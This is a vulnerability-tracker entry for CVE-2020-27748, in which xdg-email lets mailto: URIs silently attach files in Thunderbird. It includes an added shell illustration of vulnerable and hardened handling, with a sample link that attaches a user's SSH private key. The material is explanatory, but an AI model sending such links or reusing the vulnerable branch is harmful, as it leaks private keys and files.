CVE-2020-27748

Name
CVE-2020-27748
Description
A flaw was found in the xdg-email component of xdg-utils-1.1.0-rc1 and newer. When handling mailto: URIs, xdg-email allows attachments to be discreetly added via the URI when being passed to Thunderbird. An attacker could potentially send a victim a URI that automatically attaches a sensitive file to a new email. If a victim user does not notice that an attachment was added and sends the email, this could result in sensitive information disclosure. It has been confirmed that the code behind this issue is in xdg-email and not in Thunderbird.
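The mechanism the description above refers to, as an added illustration that is not xdg-utils' own code: a minimal POSIX-shell mailto: handler in the style of xdg-email that turns a URI into the string handed to "thunderbird -compose". In "legacy" mode an attach= query field from the URI becomes a Thunderbird attachment (the behaviour the advisory describes); in "hardened" mode the field is dropped. The function names, the decoding helper and the sample URI are constructed for this example.

```shell
#!/bin/sh
# Added illustration, not xdg-utils' own code: a minimal mailto: -> Thunderbird
# "-compose" translator in the style of a shell URI handler. MODE "legacy" keeps
# the behaviour the advisory describes (an attach= query field becomes a
# Thunderbird attachment); MODE "hardened" refuses it. Helper names and the
# sample URI are constructed for this example.

# Decode %XX and '+' escapes from a URI component.
url_decode() {
    s=$1
    out=""
    while [ -n "$s" ]; do
        case $s in
            %[0-9A-Fa-f][0-9A-Fa-f]*)
                hex=${s#%}
                hex=${hex%"${hex#??}"}
                out="$out$(printf "\\$(printf '%03o' "0x$hex")")"
                s=${s#???}
                ;;
            +*)
                out="$out "
                s=${s#+}
                ;;
            *)
                out="$out${s%"${s#?}"}"
                s=${s#?}
                ;;
        esac
    done
    printf '%s' "$out"
}

# mailto_to_compose URI MODE: print the string that would be handed to
# "thunderbird -compose". Only the fields listed below are honoured.
mailto_to_compose() {
    uri=$1
    mode=$2
    rest=${uri#mailto:}
    to=${rest%%\?*}
    query=""
    case $rest in
        *\?*) query=${rest#*\?} ;;
    esac
    compose="to='$(url_decode "$to")'"

    # Split the query string on '&' without letting the shell glob-expand it.
    old_ifs=$IFS
    set -f
    IFS='&'
    set -- $query
    IFS=$old_ifs
    set +f

    for pair in "$@"; do
        key=${pair%%=*}
        case $pair in
            *=*) val=${pair#*=} ;;
            *)   val="" ;;
        esac
        val=$(url_decode "$val")
        case $key in
            to|cc|bcc|subject|body)
                compose="$compose,$key='$val'"
                ;;
            attach|attachment)
                if [ "$mode" = legacy ]; then
                    # Vulnerable pattern: a file path chosen by whoever wrote
                    # the link silently becomes an attachment of the new mail.
                    compose="$compose,attachment='file://$val'"
                else
                    # Hardened: an attachment must never come from the URI.
                    printf 'xdg-email: ignoring %s=%s in mailto: URI\n' "$key" "$val" >&2
                fi
                ;;
            *)
                ;;  # other header fields are not forwarded
        esac
    done
    printf '%s\n' "$compose"
}

# Constructed sample: the kind of link an attacker could send. A victim clicking
# it would get a draft to alice@example.org with their key file attached.
SAMPLE='mailto:alice@example.org?subject=Report&attach=%2Fhome%2Fbob%2F.ssh%2Fid_rsa'
printf 'legacy:   thunderbird -compose "%s"\n' "$(mailto_to_compose "$SAMPLE" legacy)"
printf 'hardened: thunderbird -compose "%s"\n' "$(mailto_to_compose "$SAMPLE" hardened)"
```

Running the script prints the two compose strings side by side; the only difference is the attachment='file:///home/bob/.ssh/id_rsa' field, which is exactly what the victim would have to notice before pressing send. On a host, a rough heuristic (an assumption, not proof of fix status) is to read the installed handler for any code that forwards an attach field from the URI: grep -n 'attach' "$(command -v xdg-email)".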
NVD Severity
medium
Forges
GitHub (code, issues), Aports (code, issues)

References

Type URI
MISC https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
MISC https://bugzilla.redhat.com/show_bug.cgi?id=1899769

Match rules

CPE URI | Source package | Min version | Max version
cpe:2.3:a:freedesktop:xdg-utils:*:*:*:*:*:*:*:* | xdg-utils | >= 1.1.0 | none (no upper bound: no fixed version is recorded, so every build from 1.1.0 upward matches the rule)

Vulnerable and fixed packages

Source package Branch Version Maintainer Status
xdg-utils edge-community 1.1.3-r0 Natanael Copa <ncopa@alpinelinux.org> possibly vulnerable
xdg-utils 3.14-community 1.1.3-r0 Natanael Copa <ncopa@alpinelinux.org> possibly vulnerable
xdg-utils 3.11-main 1.1.3-r0 Natanael Copa <ncopa@alpinelinux.org> possibly vulnerable